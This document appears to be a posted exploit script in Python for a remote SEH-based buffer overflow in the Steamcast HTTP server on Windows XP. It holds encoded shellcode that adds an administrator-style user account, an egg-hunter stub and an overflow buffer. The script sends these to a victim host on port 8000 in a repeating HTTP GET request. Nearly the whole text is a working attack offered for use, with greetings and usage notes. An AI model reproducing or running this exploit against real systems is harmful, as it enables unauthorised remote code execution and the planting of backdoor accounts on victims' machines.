Steamcast Buffer Overflow

`#!/usr/bin/python  
#[*] Usage : steamcast.py [victime_ip]  
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]  
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.   
#[*] Tested on : Xp sp2 (fr)  
#[*] Exploited by : His0k4  
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com  
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D  
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p  
  
#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)  
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.  
#Other note : The shellcode will be executed when the program will be closed.  
#Another one : When you have problems with running the exploit msg me before you msg str0ke.  
  
import sys, socket  
import struct  
  
host = sys.argv[1]   
port = 8000  
  
  
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com  
shellcode=(  
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"  
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"  
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"  
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"  
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"  
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"  
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"  
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"  
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"  
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"  
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"  
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"  
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"  
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"  
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")  
  
shellunt=(  
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"  
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")  
  
  
exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt  
  
#It needs a loop to works  
while 1:  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
head = "GET / HTTP/1.1\r\n"  
head += "Host: "+host+"\r\n"  
head += exploit+"\r\n"  
head += "\r\n\r\n"  
  
s.send(head)  
  
`